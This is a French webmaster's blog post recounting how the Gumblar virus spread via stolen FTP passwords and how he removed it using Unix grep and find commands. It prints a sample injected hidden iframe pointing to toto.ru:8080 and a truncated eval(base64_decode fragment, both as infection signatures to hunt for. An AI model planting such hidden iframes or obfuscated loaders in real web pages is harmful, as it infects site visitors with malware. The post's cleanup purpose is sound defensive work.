Header Graphic
 
 Accueil - Techniques Internet > Comment Eliminer le Virus gumblar

   Imprimer la page   |     Ajouter aux favoris

 

  Gumblar
     Virus de sites

  
Date :
Auteur : Christian Perpezat

  Gumblar, une menace pour les sites internet. Plus de 3000 sites infectés vers Mai 2009. 

 Je connaissais les virus qui s'attaquent aux PC, mais je n'imaginais pas les virus web . Jusqu'au jour ou en me connectant à mon site ebook-success.com j'arrive sur cette page

gumblar

  Ca fait drole !!!
  J'ai fait une petite présentation du processus, comment se protéger
  
  Nouveau : Janvier 2010 la solution existe -> voir en bas de cette page
 
 
  Gumblar
   La contamination

  
  J'ai bataillé dur pour venir à bout de gumblar, et j'ai tellement effectué de commandes et d'opérations que je ne vais pas tout me rappeller, sinon l'essentiel .

  • Comment on l'attrape ? Simplement en visitant un site infecté
  • Comment il se propage ? Un petit shéma :

propagation

  1. Visite d'un site infecté, le virus s'introduit dans le PC
  2. Le virus détecte un logiciel de transfert FTP
  3. Il trouve les codes d'accès aux sites du webmaster
  4. Il va déposer son code malicieux en particulier dans les fichiers index.htm ou index.php

  Comment éviter d'être contaminé ?

  • en ayant un anti-virus à jour sur son PC
  • en évitant d'enregistrer son mot de passe FTP, hé oui, le retapper chaque fois !

  J'avoue que jusque là, je n'étais pas très prudent et un peu flemmard. Le PC toujours sous tension et Filezilla connecté en permanence à mes sites. J'ai appris depuis que Filezilla gardait les mots de passe en clair dans un fichier de l'ordinateur. Il y a eu deux nouvelles version de Filezilla depuis, il ont du faire le nécessaire.

  Je préfèrais chasser le virus de temps en temps sur mon PC que d'acheter un anti-virus. Et puis savoir éliminer un virus d'un PC me semblait utile ( pour un informaticien ) 

 
   

 

 

 
  Gumblar
   Son action sur un site

  
  Gumblar s'attaque aux fichiers principaux des sites, à savoir les fichiers index, quel que soit leur extension, donc index.htm, index.html ou index.php. Je l'ai trouvé aussi dans des fichiers main.php ou maintenance.php . Il insère dans chaqu'un de ces fichiers une ligne de code qui ressemble à ceci :

<iframe src="http://toto.ru:8080/index.php" width=100 height=150 style="visibility: hidden"></iframe>

  En gros c'est un appel caché vers un site "pirate" . Une iframe est une fenètre.

  Pour les fichiers index.php, la ligne iframe se trouvait en fin de fichier, après la balise ?>
et pour les fichiers index.html elle était souvent insérée dans la même ligne que " body"

  Heureusement pour moi, mes sites étaient très peu opérationnels, peu connus et surtout utilisés uniquement pour me former au métier de web-marketeur. J'ai eu pas moins de 300 fichiers infectés. Il faut savoir qu'une des méthodes recommandée pour protéger les répertoires d'un site est d'y placer un fichier index vide ...

  Sur mon hébergement 1and1, j'ai du réparer manuellement tous les fichiers infectés, par contre je n'ai pu le faire chez ovh, mes fichiers index ayant été partiellement effacés.
  C'était une boucle infernale,  tant que tout n'a pas été clean, le virus repartait vers mon PC qui le renvoyait sur mes sites. 
  
 
  Gumblar
      La méthode

  
  A moins d'avoir une sauvegarde complète de l'ensemble des fichiers contenus sur son serveur, et demander à son hébergeur une restauration complète, il faut s'attaquer au problème manuellement. Je n'ai pas trouvé d'information suffisante sur le net pour éradiquer complètement ce virus.

   Les deux solutions possibles que je connaisse :

  1. Downloader la totalité de son serveur sur son PC et utiliser des outils windows
  2. Se connecter directement sur son serveur et utiliser des commandes Unix

  Ayant été administrateur système pendant 15 ans, c'est cette 2ème méthode que j'ai utilisé. Je suppose  que ceux qui sont sous linux peuvent s'en inspirer. La puissance d'Unix par rapport aux outils windows ou DOS, se passe de commentaires.

  Le principe est le même dans les 2 cas :

  • trouver tous les fichiers modifiés récemment
  • trouver ceux qui contiennent à tort le mot iframe
  • corriger et sauvegarder

   
 
  Gumblar
   Les systèmes de fichiers

  

Prenons un exemple avec un fichier index.html

 Sous windows :
      Nom                Taille                Type                 Date de modification          Attributs
     index.html           10 Ko            Fichier html                 01/01/2010                archive

 Le même sous unix :

  -rw-r--r-- 1 u2615444 ftpusers 10988 Jan  1 16:33 index.html

 en clair, c'est un fichier, ses droits sont en 644, son propriétaire est u2615444, son groupe est ftpusers, sa taille est de 10988 octets, sa dernière modification est le 1er Janvier 16h33

 
 
  Gumblar
   L'éliminer directement sur le serveur

  
    Mon but ici n'est pas de faire un cours Unix, mais de lister les commandes qui m'ont permis d'éliminer gumblar de mon serveur. 

  Attention : Unix ne permet pas le droit à l'erreur, il ne pose pas la question "Are you sure", comme le DOS ou Windows, Unix exécute immédiatement.

  Je me connecte par l'intermédiaire de l'émulateur de terminal putty

  Les commandes qui m'ont été le plus utiles:

  • grep iframe * | grep 8080     /* recherche de toute ligne contenant iframe ET 8080
  • find . -type f -name "*" -exec grep iframe '{}' \;

  Cette dernière commande signifie :
cherche | ici | tout fichier | nom quelconque | puis exécute | s'il contient | le mot iframe | 

 Commande puissante, mais dont l'inconvénient est qu'elle ne montre pas quel répertoire contient le fichier. Il faut parfois la recommencer depuis chaque répertoire.

 
 
  Gumblar
   Résumé

 

  A faire, sachant qu'un seul oubli peut conduire à tout recommencer :

  1. Nettoyer complètement le PC, anti-virus à jour, Kasperski semble suffisant
  2. Mettre à jour Adobe Acrobat Reader et Adobe Flash Player 
  3. Supprimer le logiciel FTP et toutes les traces de son installation
  4. Ré-installer ce logiciel FTP et ne JAMAIS enregistrer le mot de passe
  5. Ensuite modifier les mots de passe FTP du serveur, depuis un autre PC si possible 
  6. Corriger les fichiers index et autres fichiers infectés
  7. Sauvegarder le site
  8. Prier, je plaisante :-)

  Cette méthode n'a pas la prétention d'être exhaustive, elle n'est valable que dans le cas d'infection par le code malicieux "iframe" , il existe également des fichiers infectés ou l'on trouve ce code  : eval(base64_decode('aWYoZn

  Autres constatations :

  • j'ai du refaire plusieurs fois ces manips, car le virus est revenu au moins 3 fois
  • les fichiers index passés en lecture seule (chmod 444) n'ont plus été infectés
  • Kasperski empêche le PC d'être de nouveau contaminé (pub gratuite)
  • il semble qu'Avast soit efficace, mais je ne l'ai pas testé
 
  La solution
      Nouveau

  
Date : 07 Février 2010

 C'est malin ! maintenant que j'ai résolu le problème, Jonathan Teng vient de sortir un pack Web-Guardian, qui permet d'éradiquer Gumblar. Bien que mes sites soient clean depuis 3 mois, je l'ai installé en 5 mn .
  La documentation est bien faite, même pour ceux qui ne comprennent pas bien l'anglais.

 Encore mieux, Le script est aujourd'hui en français !!

Web Server Guardian    En savoir plus ...

 
 



   Back to top     |     

 
Accueil - Techniques Internet
Prestations internet
Installer un domaine chez 1and1
Créer votre site
◦ Structure de page
◦ Logiciels
◦ Les CMS
◦ Editeurs
Comment Eliminer le Virus gumblar
Gumblar s'attaque à Wordpress
Hébergement
◦ 1and1
Google
◦ Google Adsense
◦ Astuces google
Script boutique
Générateur de Métatags
Calcul de PageRank
Contact
Mentions légales
Site Map

 

Annuaire généraliste Européen liens durs rewrite

 

Les Secrets de l'Attraction

 

Arrêter de fumer